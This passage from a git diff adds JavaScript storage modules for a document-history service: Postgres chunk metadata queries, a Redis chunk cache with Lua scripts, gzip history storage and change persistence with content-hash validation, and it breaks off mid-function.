+    .orderBy('end_version')
+    .first()
+  if (!record) {
+    throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp)
+  }
+  return chunkFromRecord(record)
+}
+
+/**
+ * Build a chunk metadata object from the database record
+ */
+function chunkFromRecord(record) {
+  return {
+    id: record.id.toString(),
+    startVersion: record.start_version,
+    endVersion: record.end_version,
+    endTimestamp: record.end_timestamp,
+  }
+}
+
+/**
+ * Get all of a project's chunk ids
+ *
+ * @param {string} projectId
+ */
+async function getProjectChunkIds(projectId) {
+  assert.postgresId(projectId, 'bad projectId')
+
+  const records = await knex('chunks')
+    .select('id')
+    .where('doc_id', parseInt(projectId, 10))
+  return records.map(record => record.id)
+}
+
+/**
+ * Get all of a project's chunks directly
+ *
+ * @param {string} projectId
+ */
+async function getProjectChunks(projectId) {
+  assert.postgresId(projectId, 'bad projectId')
+
+  const records = await knex('chunks')
+    .select()
+    .where('doc_id', parseInt(projectId, 10))
+    .orderBy('end_version')
+  return records.map(chunkFromRecord)
+}
+
+/**
+ * Insert a pending chunk before sending it to object storage.
+ *
+ * @param {string} projectId
+ * @param {Chunk} chunk
+ */
+async function insertPendingChunk(projectId, chunk) {
+  assert.postgresId(projectId, 'bad projectId')
+
+  const result = await knex.first(
+    knex.raw("nextval('chunks_id_seq'::regclass)::integer as chunkid")
+  )
+  const chunkId = result.chunkid
+  await knex('pending_chunks').insert({
+    id: chunkId,
+    doc_id: parseInt(projectId, 10),
+    end_version: chunk.getEndVersion(),
+    start_version: chunk.getStartVersion(),
+    end_timestamp: chunk.getEndTimestamp(),
+  })
+  return chunkId.toString()
+}
+
+/**
+ * Record that a new chunk was created.
+ *
+ * @param {string} projectId
+ * @param {Chunk} chunk
+ * @param {string} chunkId
+ * @param {object} opts
+ * @param {Date} [opts.earliestChangeTimestamp]
+ * @param {string} [opts.oldChunkId]
+ */
+async function confirmCreate(projectId, chunk, chunkId, opts = {}) {
+  assert.postgresId(projectId, 'bad projectId')
+
+  await knex.transaction(async tx => {
+    if (opts.oldChunkId != null) {
+      await _assertChunkIsNotClosed(tx, projectId, opts.oldChunkId)
+      await _closeChunk(tx, projectId, opts.oldChunkId)
+    }
+    await Promise.all([
+      _deletePendingChunk(tx, projectId, chunkId),
+      _insertChunk(tx, projectId, chunk, chunkId),
+    ])
+    await updateProjectRecord(
+      // The history id in Mongo is an integer for Postgres projects
+      parseInt(projectId, 10),
+      chunk,
+      opts.earliestChangeTimestamp
+    )
+  })
+}
+
+/**
+ * Record that a chunk was replaced by a new one.
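+ * Runs in a single transaction: the old chunk must not be closed, its row is
+ * moved to old_chunks, and the new pending chunk is promoted in its place.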
+ * + * @param {string} projectId + * @param {string} oldChunkId + * @param {Chunk} newChunk + * @param {string} newChunkId + */ +async function confirmUpdate( + projectId, + oldChunkId, + newChunk, + newChunkId, + opts = {} +) { + assert.postgresId(projectId, 'bad projectId') + + await knex.transaction(async tx => { + await _assertChunkIsNotClosed(tx, projectId, oldChunkId) + await _deleteChunks(tx, { doc_id: projectId, id: oldChunkId }) + await Promise.all([ + _deletePendingChunk(tx, projectId, newChunkId), + _insertChunk(tx, projectId, newChunk, newChunkId), + ]) + await updateProjectRecord( + // The history id in Mongo is an integer for Postgres projects + parseInt(projectId, 10), + newChunk, + opts.earliestChangeTimestamp + ) + }) +} + +/** + * Delete a pending chunk + * + * @param {Knex} tx + * @param {string} projectId + * @param {string} chunkId + */ +async function _deletePendingChunk(tx, projectId, chunkId) { + await tx('pending_chunks') + .where({ + doc_id: parseInt(projectId, 10), + id: parseInt(chunkId, 10), + }) + .del() +} + +/** + * Adds an active chunk + * + * @param {Knex} tx + * @param {string} projectId + * @param {Chunk} chunk + * @param {string} chunkId + */ +async function _insertChunk(tx, projectId, chunk, chunkId) { + const startVersion = chunk.getStartVersion() + const endVersion = chunk.getEndVersion() + try { + await tx('chunks').insert({ + id: parseInt(chunkId, 10), + doc_id: parseInt(projectId, 10), + start_version: startVersion, + end_version: endVersion, + end_timestamp: chunk.getEndTimestamp(), + }) + } catch (err) { + if ( + err instanceof Error && + 'code' in err && + err.code === DUPLICATE_KEY_ERROR_CODE + ) { + throw new ChunkVersionConflictError( + 'chunk start or end version is not unique', + { projectId, chunkId, startVersion, endVersion } + ) + } + throw err + } +} + +/** + * Check that a chunk is not closed + * + * This is used to synchronize chunk creations and extensions. + * + * @param {Knex} tx + * @param {string} projectId + * @param {string} chunkId + */ +async function _assertChunkIsNotClosed(tx, projectId, chunkId) { + const record = await tx('chunks') + .forUpdate() + .select('closed') + .where('doc_id', parseInt(projectId, 10)) + .where('id', parseInt(chunkId, 10)) + .first() + if (!record) { + throw new ChunkVersionConflictError('unable to close chunk: not found', { + projectId, + chunkId, + }) + } + if (record.closed) { + throw new ChunkVersionConflictError( + 'unable to close chunk: already closed', + { + projectId, + chunkId, + } + ) + } +} + +/** + * Close a chunk + * + * A closed chunk can no longer be extended. + * + * @param {Knex} tx + * @param {string} projectId + * @param {string} chunkId + */ +async function _closeChunk(tx, projectId, chunkId) { + await tx('chunks') + .update({ closed: true }) + .where('doc_id', parseInt(projectId, 10)) + .where('id', parseInt(chunkId, 10)) +} + +/** + * Delete a chunk. 
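+ * The deleted row is recorded in old_chunks (with deleted_at set) so that
+ * the object storage cleanup can be batched later.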
+ * + * @param {string} projectId + * @param {string} chunkId + */ +async function deleteChunk(projectId, chunkId) { + assert.postgresId(projectId, 'bad projectId') + assert.integer(chunkId, 'bad chunkId') + + await _deleteChunks(knex, { + doc_id: parseInt(projectId, 10), + id: parseInt(chunkId, 10), + }) +} + +/** + * Delete all of a project's chunks + * + * @param {string} projectId + */ +async function deleteProjectChunks(projectId) { + assert.postgresId(projectId, 'bad projectId') + + await knex.transaction(async tx => { + await _deleteChunks(knex, { doc_id: parseInt(projectId, 10) }) + }) +} + +/** + * Delete many chunks + * + * @param {Knex} tx + * @param {any} whereClause + */ +async function _deleteChunks(tx, whereClause) { + const rows = await tx('chunks').where(whereClause).del().returning('*') + if (rows.length === 0) { + return + } + + const oldChunks = rows.map(row => ({ + doc_id: row.doc_id, + chunk_id: row.id, + start_version: row.start_version, + end_version: row.end_version, + end_timestamp: row.end_timestamp, + deleted_at: tx.fn.now(), + })) + await tx('old_chunks').insert(oldChunks) +} + +/** + * Get a batch of old chunks for deletion + * + * @param {number} count + * @param {number} minAgeSecs + */ +async function getOldChunksBatch(count, minAgeSecs) { + const maxDeletedAt = new Date(Date.now() - minAgeSecs * 1000) + const records = await knex('old_chunks') + .whereNull('deleted_at') + .orWhere('deleted_at', '<', maxDeletedAt) + .orderBy('chunk_id') + .limit(count) + return records.map(oldChunk => ({ + projectId: oldChunk.doc_id.toString(), + chunkId: oldChunk.chunk_id.toString(), + })) +} + +/** + * Delete a batch of old chunks from the database + * + * @param {string[]} chunkIds + */ +async function deleteOldChunks(chunkIds) { + await knex('old_chunks') + .whereIn( + 'chunk_id', + chunkIds.map(id => parseInt(id, 10)) + ) + .del() +} + +/** + * Generate a new project id + */ +async function generateProjectId() { + const record = await knex.first( + knex.raw("nextval('docs_id_seq'::regclass)::integer as doc_id") + ) + return record.doc_id.toString() +} + +module.exports = { + getLatestChunk, + getFirstChunkBeforeTimestamp, + getLastActiveChunkBeforeTimestamp, + getChunkForVersion, + getChunkForTimestamp, + getProjectChunkIds, + getProjectChunks, + insertPendingChunk, + confirmCreate, + confirmUpdate, + deleteChunk, + deleteProjectChunks, + getOldChunksBatch, + deleteOldChunks, + generateProjectId, +} diff --git a/services/history-v1/storage/lib/chunk_store/redis.js b/services/history-v1/storage/lib/chunk_store/redis.js new file mode 100644 index 0000000..55f36ff --- /dev/null +++ b/services/history-v1/storage/lib/chunk_store/redis.js @@ -0,0 +1,254 @@ +const metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const redis = require('../redis') +const rclient = redis.rclientHistory // +const { Snapshot, Change, History, Chunk } = require('overleaf-editor-core') + +const TEMPORARY_CACHE_LIFETIME = 300 // 5 minutes + +const keySchema = { + snapshot({ projectId }) { + return `snapshot:{${projectId}}` + }, + startVersion({ projectId }) { + return `snapshot-version:{${projectId}}` + }, + changes({ projectId }) { + return `changes:{${projectId}}` + }, +} + +rclient.defineCommand('get_current_chunk', { + numberOfKeys: 3, + lua: ` + local startVersionValue = redis.call('GET', KEYS[2]) + if not startVersionValue then + return nil -- this is a cache-miss + end + local snapshotValue = redis.call('GET', KEYS[1]) + local changesValues = 
redis.call('LRANGE', KEYS[3], 0, -1) + return {snapshotValue, startVersionValue, changesValues} + `, +}) + +/** + * Retrieves the current chunk of project history from Redis storage + * @param {string} projectId - The unique identifier of the project + * @returns {Promise<Chunk|null>} A Promise that resolves to a Chunk object containing project history, + * or null if retrieval fails + * @throws {Error} If Redis operations fail + */ +async function getCurrentChunk(projectId) { + try { + const result = await rclient.get_current_chunk( + keySchema.snapshot({ projectId }), + keySchema.startVersion({ projectId }), + keySchema.changes({ projectId }) + ) + if (!result) { + return null // cache-miss + } + const snapshot = Snapshot.fromRaw(JSON.parse(result[0])) + const startVersion = JSON.parse(result[1]) + const changes = result[2].map(c => Change.fromRaw(JSON.parse(c))) + const history = new History(snapshot, changes) + const chunk = new Chunk(history, startVersion) + metrics.inc('chunk_store.redis.get_current_chunk', 1, { status: 'success' }) + return chunk + } catch (err) { + logger.error({ err, projectId }, 'error getting current chunk from redis') + metrics.inc('chunk_store.redis.get_current_chunk', 1, { status: 'error' }) + return null + } +} + +rclient.defineCommand('get_current_chunk_metadata', { + numberOfKeys: 2, + lua: ` + local startVersionValue = redis.call('GET', KEYS[1]) + local changesCount = redis.call('LLEN', KEYS[2]) + return {startVersionValue, changesCount} + `, +}) + +/** + * Retrieves the current chunk metadata for a given project from Redis + * @param {string} projectId - The ID of the project to get metadata for + * @returns {Promise<Object|null>} Object containing startVersion and changesCount if found, null on error or cache miss + * @property {number} startVersion - The starting version information + * @property {number} changesCount - The number of changes in the chunk + */ +async function getCurrentChunkMetadata(projectId) { + try { + const result = await rclient.get_current_chunk_metadata( + keySchema.startVersion({ projectId }), + keySchema.changes({ projectId }) + ) + if (!result) { + return null // cache-miss + } + const startVersion = JSON.parse(result[0]) + const changesCount = parseInt(result[1], 10) + return { startVersion, changesCount } + } catch (err) { + return null + } +} + +rclient.defineCommand('set_current_chunk', { + numberOfKeys: 3, + lua: ` + local snapshotValue = ARGV[1] + local startVersionValue = ARGV[2] + redis.call('SETEX', KEYS[1], ${TEMPORARY_CACHE_LIFETIME}, snapshotValue) + redis.call('SETEX', KEYS[2], ${TEMPORARY_CACHE_LIFETIME}, startVersionValue) + redis.call('DEL', KEYS[3]) -- clear the old changes list + if #ARGV >= 3 then + redis.call('RPUSH', KEYS[3], unpack(ARGV, 3)) + redis.call('EXPIRE', KEYS[3], ${TEMPORARY_CACHE_LIFETIME}) + end + `, +}) + +/** + * Stores the current chunk of project history in Redis + * @param {string} projectId - The ID of the project + * @param {Chunk} chunk - The chunk object containing history data + * @returns {Promise<*>} Returns the result of the Redis operation, or null if an error occurs + * @throws {Error} May throw Redis-related errors which are caught internally + */ +async function setCurrentChunk(projectId, chunk) { + try { + const snapshotKey = keySchema.snapshot({ projectId }) + const startVersionKey = keySchema.startVersion({ projectId }) + const changesKey = keySchema.changes({ projectId }) + + const snapshot = chunk.history.snapshot + const startVersion = chunk.startVersion + const changes 
= chunk.history.changes
+
+    await rclient.set_current_chunk(
+      snapshotKey,
+      startVersionKey,
+      changesKey,
+      JSON.stringify(snapshot.toRaw()),
+      startVersion,
+      ...changes.map(c => JSON.stringify(c.toRaw()))
+    )
+    metrics.inc('chunk_store.redis.set_current_chunk', 1, { status: 'success' })
+  } catch (err) {
+    logger.error(
+      { err, projectId, chunk },
+      'error setting current chunk in redis'
+    )
+    metrics.inc('chunk_store.redis.set_current_chunk', 1, { status: 'error' })
+    return null // while testing we will suppress any errors
+  }
+}
+
+/**
+ * Checks whether a cached chunk's version metadata matches the current chunk's metadata
+ * @param {Chunk} cachedChunk - The chunk retrieved from cache
+ * @param {Chunk} currentChunk - The current chunk to compare against
+ * @returns {boolean} - Returns true if the chunks have matching start and end versions, false otherwise
+ */
+function checkCacheValidity(cachedChunk, currentChunk) {
+  return Boolean(
+    cachedChunk &&
+      cachedChunk.getStartVersion() === currentChunk.getStartVersion() &&
+      cachedChunk.getEndVersion() === currentChunk.getEndVersion()
+  )
+}
+
+/**
+ * Validates if a cached chunk matches the current chunk metadata by comparing versions
+ * @param {Object} cachedChunk - The cached chunk object to validate
+ * @param {Object} currentChunkMetadata - The current chunk metadata to compare against
+ * @param {number} currentChunkMetadata.startVersion - The starting version number
+ * @param {number} currentChunkMetadata.endVersion - The ending version number
+ * @returns {boolean} - True if the cached chunk is valid, false otherwise
+ */
+function checkCacheValidityWithMetadata(cachedChunk, currentChunkMetadata) {
+  return Boolean(
+    cachedChunk &&
+      cachedChunk.getStartVersion() === currentChunkMetadata.startVersion &&
+      cachedChunk.getEndVersion() === currentChunkMetadata.endVersion
+  )
+}
+
+/**
+ * Compares two chunks for equality using stringified JSON comparison
+ * @param {string} projectId - The ID of the project
+ * @param {Chunk} cachedChunk - The cached chunk to compare
+ * @param {Chunk} currentChunk - The current chunk to compare against
+ * @returns {boolean} - Returns false if either chunk is null/undefined, otherwise returns the comparison result
+ */
+function compareChunks(projectId, cachedChunk, currentChunk) {
+  if (!cachedChunk || !currentChunk) {
+    return false
+  }
+  const identical = JSON.stringify(cachedChunk) === JSON.stringify(currentChunk)
+  if (!identical) {
+    try {
+      logger.error(
+        {
+          projectId,
+          cachedChunkStartVersion: cachedChunk.getStartVersion(),
+          cachedChunkEndVersion: cachedChunk.getEndVersion(),
+          currentChunkStartVersion: currentChunk.getStartVersion(),
+          currentChunkEndVersion: currentChunk.getEndVersion(),
+        },
+        'chunk cache mismatch'
+      )
+    } catch (err) {
+      // ignore errors while logging
+    }
+  }
+  metrics.inc('chunk_store.redis.compare_chunks', 1, {
+    status: identical ?
'success' : 'fail', + }) + return identical +} + +// Define Lua script for atomic cache clearing +rclient.defineCommand('clear_chunk_cache', { + numberOfKeys: 3, + lua: ` + -- Delete all keys related to a project's chunk cache atomically + redis.call('DEL', KEYS[1]) -- snapshot key + redis.call('DEL', KEYS[2]) -- startVersion key + redis.call('DEL', KEYS[3]) -- changes key + return 1 + `, +}) + +/** + * Clears all cache entries for a project's chunk data + * @param {string} projectId - The ID of the project whose cache should be cleared + * @returns {Promise<boolean>} A promise that resolves to true if successful, false on error + */ +async function clearCache(projectId) { + try { + const snapshotKey = keySchema.snapshot({ projectId }) + const startVersionKey = keySchema.startVersion({ projectId }) + const changesKey = keySchema.changes({ projectId }) + + await rclient.clear_chunk_cache(snapshotKey, startVersionKey, changesKey) + metrics.inc('chunk_store.redis.clear_cache', 1, { status: 'success' }) + return true + } catch (err) { + logger.error({ err, projectId }, 'error clearing chunk cache from redis') + metrics.inc('chunk_store.redis.clear_cache', 1, { status: 'error' }) + return false + } +} + +module.exports = { + getCurrentChunk, + setCurrentChunk, + getCurrentChunkMetadata, + checkCacheValidity, + checkCacheValidityWithMetadata, + compareChunks, + clearCache, +} diff --git a/services/history-v1/storage/lib/content_hash.js b/services/history-v1/storage/lib/content_hash.js new file mode 100644 index 0000000..a381bab --- /dev/null +++ b/services/history-v1/storage/lib/content_hash.js @@ -0,0 +1,18 @@ +// @ts-check + +const { createHash } = require('node:crypto') + +/** + * Compute a SHA-1 hash of the content + * + * This is used to validate incoming updates. + * + * @param {string} content + */ +function getContentHash(content) { + const hash = createHash('sha-1') + hash.update(content) + return hash.digest('hex') +} + +module.exports = { getContentHash } diff --git a/services/history-v1/storage/lib/errors.js b/services/history-v1/storage/lib/errors.js new file mode 100644 index 0000000..626536b --- /dev/null +++ b/services/history-v1/storage/lib/errors.js @@ -0,0 +1,5 @@ +const OError = require('@overleaf/o-error') + +class InvalidChangeError extends OError {} + +module.exports = { InvalidChangeError } diff --git a/services/history-v1/storage/lib/hash_check_blob_store.js b/services/history-v1/storage/lib/hash_check_blob_store.js new file mode 100644 index 0000000..5f233d5 --- /dev/null +++ b/services/history-v1/storage/lib/hash_check_blob_store.js @@ -0,0 +1,30 @@ +const Blob = require('overleaf-editor-core').Blob +const blobHash = require('./blob_hash') +const BPromise = require('bluebird') + +// We want to simulate applying all of the operations so we can return the +// resulting hashes to the caller for them to check. To do this, we need to be +// able to take the lazy files in the final snapshot, fetch their content, and +// compute the new content hashes. We don't, however, need to actually store +// that content; we just need to get the hash. 
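+//
+// putString, for instance, returns a Blob whose hash is computed in memory
+// via blobHash.fromString, without writing anything to object storage.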
+function HashCheckBlobStore(realBlobStore) {
+  this.realBlobStore = realBlobStore
+}
+
+HashCheckBlobStore.prototype.getString = BPromise.method(
+  function hashCheckBlobStoreGetString(hash) {
+    return this.realBlobStore.getString(hash)
+  }
+)
+
+HashCheckBlobStore.prototype.putString = BPromise.method(
+  function hashCheckBlobStorePutString(string) {
+    return new Blob(
+      blobHash.fromString(string),
+      Buffer.byteLength(string),
+      string.length
+    )
+  }
+)
+
+module.exports = HashCheckBlobStore
diff --git a/services/history-v1/storage/lib/history_store.js b/services/history-v1/storage/lib/history_store.js
new file mode 100644
index 0000000..e51bdc2
--- /dev/null
+++ b/services/history-v1/storage/lib/history_store.js
@@ -0,0 +1,202 @@
+// @ts-check
+'use strict'
+
+const core = require('overleaf-editor-core')
+
+const config = require('config')
+const path = require('node:path')
+const Stream = require('node:stream')
+const { promisify } = require('node:util')
+const zlib = require('node:zlib')
+
+const OError = require('@overleaf/o-error')
+const objectPersistor = require('@overleaf/object-persistor')
+const logger = require('@overleaf/logger')
+
+const assert = require('./assert')
+const persistor = require('./persistor')
+const projectKey = require('./project_key')
+const streams = require('./streams')
+
+const Chunk = core.Chunk
+
+const gzip = promisify(zlib.gzip)
+const gunzip = promisify(zlib.gunzip)
+
+class LoadError extends OError {
+  /**
+   * @param {string} projectId
+   * @param {string} chunkId
+   * @param {any} cause
+   */
+  constructor(projectId, chunkId, cause) {
+    super(
+      'HistoryStore: failed to load chunk history',
+      { projectId, chunkId },
+      cause
+    )
+    this.projectId = projectId
+    this.chunkId = chunkId
+  }
+}
+
+class StoreError extends OError {
+  /**
+   * @param {string} projectId
+   * @param {string} chunkId
+   * @param {any} cause
+   */
+  constructor(projectId, chunkId, cause) {
+    super(
+      'HistoryStore: failed to store chunk history',
+      { projectId, chunkId },
+      cause
+    )
+    this.projectId = projectId
+    this.chunkId = chunkId
+  }
+}
+
+/**
+ * @param {string} projectId
+ * @param {string} chunkId
+ * @return {string}
+ */
+function getKey(projectId, chunkId) {
+  return path.join(projectKey.format(projectId), projectKey.pad(chunkId))
+}
+
+/**
+ * Store and retrieve raw {@link History} objects from the bucket. Mainly used
+ * via the {@link ChunkStore}.
+ *
+ * Histories are stored as gzipped JSON blobs, keyed on the project ID and the
+ * ID of the Chunk that owns the history. The project ID is currently redundant,
+ * but I think it might help in future if we have to shard on project ID, and
+ * it gives us some chance of reconstructing histories even if there is a
+ * problem with the chunk metadata in the database.
+ *
+ * @class
+ */
+class HistoryStore {
+  #persistor
+  #bucket
+  constructor(persistor, bucket) {
+    this.#persistor = persistor
+    this.#bucket = bucket
+  }
+
+  /**
+   * Load the raw object for a History.
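+   * The history is stored as a gzipped JSON blob; if the object is missing,
+   * this is surfaced as Chunk.NotPersistedError rather than a LoadError.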
+ * + * @param {string} projectId + * @param {string} chunkId + * @return {Promise<import('overleaf-editor-core/lib/types').RawHistory>} + */ + async loadRaw(projectId, chunkId) { + assert.projectId(projectId, 'bad projectId') + assert.chunkId(chunkId, 'bad chunkId') + + const key = getKey(projectId, chunkId) + + logger.debug({ projectId, chunkId }, 'loadRaw started') + try { + const buf = await streams.gunzipStreamToBuffer( + await this.#persistor.getObjectStream(this.#bucket, key) + ) + return JSON.parse(buf.toString('utf-8')) + } catch (err) { + if (err instanceof objectPersistor.Errors.NotFoundError) { + throw new Chunk.NotPersistedError(projectId) + } + throw new LoadError(projectId, chunkId, err) + } finally { + logger.debug({ projectId, chunkId }, 'loadRaw finished') + } + } + + async loadRawWithBuffer(projectId, chunkId) { + assert.projectId(projectId, 'bad projectId') + assert.chunkId(chunkId, 'bad chunkId') + + const key = getKey(projectId, chunkId) + + logger.debug({ projectId, chunkId }, 'loadBuffer started') + try { + const buf = await streams.readStreamToBuffer( + await this.#persistor.getObjectStream(this.#bucket, key) + ) + const unzipped = await gunzip(buf) + return { + buffer: buf, + raw: JSON.parse(unzipped.toString('utf-8')), + } + } catch (err) { + if (err instanceof objectPersistor.Errors.NotFoundError) { + throw new Chunk.NotPersistedError(projectId) + } + throw new LoadError(projectId, chunkId, err) + } finally { + logger.debug({ projectId, chunkId }, 'loadBuffer finished') + } + } + + /** + * Compress and store a {@link History}. + * + * @param {string} projectId + * @param {string} chunkId + * @param {import('overleaf-editor-core/lib/types').RawHistory} rawHistory + */ + async storeRaw(projectId, chunkId, rawHistory) { + assert.projectId(projectId, 'bad projectId') + assert.chunkId(chunkId, 'bad chunkId') + assert.object(rawHistory, 'bad rawHistory') + + const key = getKey(projectId, chunkId) + + logger.debug({ projectId, chunkId }, 'storeRaw started') + + const buf = await gzip(JSON.stringify(rawHistory)) + try { + await this.#persistor.sendStream( + this.#bucket, + key, + Stream.Readable.from([buf]), + { + contentType: 'application/json', + contentEncoding: 'gzip', + contentLength: buf.byteLength, + } + ) + } catch (err) { + throw new StoreError(projectId, chunkId, err) + } finally { + logger.debug({ projectId, chunkId }, 'storeRaw finished') + } + } + + /** + * Delete multiple chunks from bucket. 
Expects an Array of objects with + * projectId and chunkId properties + * @param {Array<{projectId: string,chunkId:string}>} chunks + */ + async deleteChunks(chunks) { + logger.debug({ chunks }, 'deleteChunks started') + try { + await Promise.all( + chunks.map(chunk => { + const key = getKey(chunk.projectId, chunk.chunkId) + return this.#persistor.deleteObject(this.#bucket, key) + }) + ) + } finally { + logger.debug({ chunks }, 'deleteChunks finished') + } + } +} + +module.exports = { + HistoryStore, + historyStore: new HistoryStore(persistor, config.get('chunkStore.bucket')), +} diff --git a/services/history-v1/storage/lib/knex.js b/services/history-v1/storage/lib/knex.js new file mode 100644 index 0000000..7000fe0 --- /dev/null +++ b/services/history-v1/storage/lib/knex.js @@ -0,0 +1,8 @@ +// @ts-check + +'use strict' + +const env = process.env.NODE_ENV || 'development' + +const knexfile = require('../../knexfile') +module.exports = require('knex').default(knexfile[env]) diff --git a/services/history-v1/storage/lib/knex_read_only.js b/services/history-v1/storage/lib/knex_read_only.js new file mode 100644 index 0000000..a78c468 --- /dev/null +++ b/services/history-v1/storage/lib/knex_read_only.js @@ -0,0 +1,19 @@ +'use strict' + +const config = require('config') +const knexfile = require('../../knexfile') + +const env = process.env.NODE_ENV || 'development' + +if (config.databaseUrlReadOnly) { + module.exports = require('knex')({ + ...knexfile[env], + pool: { + ...knexfile[env].pool, + min: 0, + }, + connection: config.databaseUrlReadOnly, + }) +} else { + module.exports = require('./knex') +} diff --git a/services/history-v1/storage/lib/mongodb.js b/services/history-v1/storage/lib/mongodb.js new file mode 100644 index 0000000..e887bc2 --- /dev/null +++ b/services/history-v1/storage/lib/mongodb.js @@ -0,0 +1,30 @@ +const Metrics = require('@overleaf/metrics') + +const config = require('config') +const { MongoClient } = require('mongodb') + +const client = new MongoClient(config.mongo.uri) +const db = client.db() + +const chunks = db.collection('projectHistoryChunks') +const blobs = db.collection('projectHistoryBlobs') +const globalBlobs = db.collection('projectHistoryGlobalBlobs') +const shardedBlobs = db.collection('projectHistoryShardedBlobs') +const projects = db.collection('projects') +// Temporary collection for tracking progress of backed up old blobs (without a hash). +// The initial sync process will be able to skip over these. 
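// (Editor's note: each element of "blobs" is the mongodb driver's Binary
// wrapper around the raw SHA-1 digest bytes of a backed-up blob; see
// #storeBackedUpBlobs in scripts/back_fill_file_hash.mjs.)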
+// Schema: _id: projectId, blobs: [Binary] +const backedUpBlobs = db.collection('projectHistoryBackedUpBlobs') + +Metrics.mongodb.monitor(client) + +module.exports = { + client, + db, + chunks, + blobs, + globalBlobs, + projects, + shardedBlobs, + backedUpBlobs, +} diff --git a/services/history-v1/storage/lib/persist_changes.js b/services/history-v1/storage/lib/persist_changes.js new file mode 100644 index 0000000..8a848aa --- /dev/null +++ b/services/history-v1/storage/lib/persist_changes.js @@ -0,0 +1,261 @@ +// @ts-check + +'use strict' + +const _ = require('lodash') +const logger = require('@overleaf/logger') + +const core = require('overleaf-editor-core') +const Chunk = core.Chunk +const History = core.History + +const assert = require('./assert') +const chunkStore = require('./chunk_store') +const { BlobStore } = require('./blob_store') +const { InvalidChangeError } = require('./errors') +const { getContentHash } = require('./content_hash') + +function countChangeBytes(change) { + // Note: This is not quite accurate, because the raw change may contain raw + // file info (or conceivably even content) that will not be included in the + // actual stored object. + return Buffer.byteLength(JSON.stringify(change.toRaw())) +} + +function totalChangeBytes(changes) { + return changes.length ? _(changes).map(countChangeBytes).sum() : 0 +} + +// provide a simple timer function +function Timer() { + this.t0 = process.hrtime() +} +Timer.prototype.elapsed = function () { + const dt = process.hrtime(this.t0) + const timeInMilliseconds = (dt[0] + dt[1] * 1e-9) * 1e3 + return timeInMilliseconds +} + +/** + * Break the given set of changes into zero or more Chunks according to the + * provided limits and store them. + * + * Some other possible improvements: + * 1. This does a lot more JSON serialization than it has to. We may know the + * JSON for the changes before we call this function, so we could in that + * case get the byte size of each change without doing any work. Even if we + * don't know it initially, we could save some computation by caching this + * info rather than recomputing it many times. TBD whether it is worthwhile. + * 2. We don't necessarily have to fetch the latest chunk in order to determine + * that it is full. We could store this in the chunk metadata record. It may + * be worth distinguishing between a Chunk and its metadata record. The + * endVersion may be better suited to the metadata record. + * + * @param {string} projectId + * @param {core.Change[]} allChanges + * @param {Object} limits + * @param {number} clientEndVersion + * @return {Promise.<Object?>} + */ +async function persistChanges(projectId, allChanges, limits, clientEndVersion) { + assert.projectId(projectId) + assert.array(allChanges) + assert.maybe.object(limits) + assert.integer(clientEndVersion) + + const blobStore = new BlobStore(projectId) + + const earliestChangeTimestamp = + allChanges.length > 0 ? allChanges[0].getTimestamp() : null + + let currentChunk + + /** + * currentSnapshot tracks the latest change that we're applying; we use it to + * check that the changes we are persisting are valid. 
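   * (Editor's note: it is seeded from the latest chunk's snapshot, advanced
   * with applyAll over that chunk's existing changes, and then stepped change
   * by change in fillChunk via iterativelyApplyTo.)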
+ * + * @type {core.Snapshot} + */ + let currentSnapshot + + let originalEndVersion + let changesToPersist + + limits = limits || {} + _.defaults(limits, { + changeBucketMinutes: 60, + maxChanges: 2500, + maxChangeBytes: 5 * 1024 * 1024, + maxChunkChanges: 2000, + maxChunkChangeBytes: 5 * 1024 * 1024, + maxChunkChangeTime: 5000, // warn if total time for changes in a chunk takes longer than this + }) + + function checkElapsedTime(timer) { + const timeTaken = timer.elapsed() + if (timeTaken > limits.maxChunkChangeTime) { + console.log('warning: slow chunk', projectId, timeTaken) + } + } + + /** + * Add changes to a chunk until the chunk is full + * + * The chunk is full if it reaches a certain number of changes or a certain + * size in bytes + * + * @param {core.Chunk} chunk + * @param {core.Change[]} changes + */ + async function fillChunk(chunk, changes) { + let totalBytes = totalChangeBytes(chunk.getChanges()) + let changesPushed = false + while (changes.length > 0) { + if (chunk.getChanges().length >= limits.maxChunkChanges) { + break + } + + const change = changes[0] + const changeBytes = countChangeBytes(change) + + if (totalBytes + changeBytes > limits.maxChunkChangeBytes) { + break + } + + for (const operation of change.iterativelyApplyTo(currentSnapshot, { + strict: true, + })) { + await validateContentHash(operation) + } + + chunk.pushChanges([change]) + changes.shift() + totalBytes += changeBytes + changesPushed = true + } + return changesPushed + } + + /** + * Check that the operation is valid and can be incorporated to the history. + * + * For now, this checks content hashes when they are provided. + * + * @param {core.Operation} operation + */ + async function validateContentHash(operation) { + if (operation instanceof core.EditFileOperation) { + const editOperation = operation.getOperation() + if ( + editOperation instanceof core.TextOperation && + editOperation.contentHash != null + ) { + const path = operation.getPathname() + const file = currentSnapshot.getFile(path) + if (file == null) { + throw new InvalidChangeError('file not found for hash validation', { + projectId, + path, + }) + } + await file.load('eager', blobStore) + const content = file.getContent({ filterTrackedDeletes: true }) + const expectedHash = editOperation.contentHash + const actualHash = content != null ? getContentHash(content) : null + logger.debug({ expectedHash, actualHash }, 'validating content hash') + if (actualHash !== expectedHash) { + throw new InvalidChangeError('content hash mismatch', { + projectId, + path, + expectedHash, + actualHash, + }) + } + + // Remove the content hash from the change before storing it in the chunk. + // It was only useful for validation. 
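          // (Editor's note: clearing it should also keep the stored change
          // identical whether or not the client supplied a hash.)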
+ editOperation.contentHash = null + } + } + } + + async function extendLastChunkIfPossible() { + const latestChunk = await chunkStore.loadLatest(projectId) + + currentChunk = latestChunk + originalEndVersion = latestChunk.getEndVersion() + if (originalEndVersion !== clientEndVersion) { + throw new Chunk.ConflictingEndVersion( + clientEndVersion, + originalEndVersion + ) + } + + currentSnapshot = latestChunk.getSnapshot().clone() + const timer = new Timer() + currentSnapshot.applyAll(latestChunk.getChanges()) + + const changesPushed = await fillChunk(currentChunk, changesToPersist) + if (!changesPushed) { + return + } + + checkElapsedTime(timer) + + await chunkStore.update( + projectId, + originalEndVersion, + currentChunk, + earliestChangeTimestamp + ) + } + + async function createNewChunksAsNeeded() { + while (changesToPersist.length > 0) { + const endVersion = currentChunk.getEndVersion() + const history = new History(currentSnapshot.clone(), []) + const chunk = new Chunk(history, endVersion) + const timer = new Timer() + + const changesPushed = await fillChunk(chunk, changesToPersist) + if (changesPushed) { + checkElapsedTime(timer) + currentChunk = chunk + await chunkStore.create(projectId, chunk, earliestChangeTimestamp) + } else { + throw new Error('failed to fill empty chunk') + } + } + } + + function isOlderThanMinChangeTimestamp(change) { + return change.getTimestamp().getTime() < limits.minChangeTimestamp + 